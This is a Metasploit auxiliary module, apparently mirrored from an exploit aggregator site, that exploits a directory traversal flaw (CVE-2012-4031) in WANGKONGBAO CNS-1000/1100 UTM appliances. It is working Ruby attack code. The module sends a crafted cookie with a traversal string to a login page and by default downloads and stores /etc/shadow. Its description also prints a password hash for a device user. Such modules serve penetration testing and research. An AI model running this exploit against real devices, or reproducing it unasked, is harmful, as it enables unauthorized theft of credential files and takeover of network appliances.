## https://sploitus.com/exploit?id=PACKETSTORM:181173
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal',
'Description' => %q{
This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka
Network Security Platform. This directory traversal vulnerability is interesting
because the apache server is running as root, this means we can grab anything we
want! For instance, the /etc/shadow and /etc/passwd files for the special
kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user
},
'References' =>
[
['CVE', '2012-4031'],
['EDB', '19526']
],
'Author' =>
[
'Dillon Beresford'
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(85),
OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']),
OptInt.new('DEPTH', [true, 'Traversal depth', 10])
])
end
def run_host(ip)
# No point to continue if no filename is specified
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
print_error("Please supply the name of the file you want to download")
return
end
travs = "../" * datastore['DEPTH']
travs = travs[0,travs.rindex('/')]
# Create request
res = send_request_raw({
'method' => 'GET',
'uri' => "/src/acloglogin.php",
'headers' =>
{
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
'Cookie' => "PHPSESSID=af0402062689e5218a8bdad17d03f559; lang=owned" + travs + datastore['FILEPATH'] + "/."*4043
},
}, 25)
print_good "File retrieved successfully"
# Show data if needed
if res and res.code == 200
vprint_line(res.to_s)
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'cns1000utm.http',
'application/octet-stream',
ip,
res.body,
fname
)
print_status("File saved in: #{path}")
else
print_error("Nothing was downloaded")
end
end
end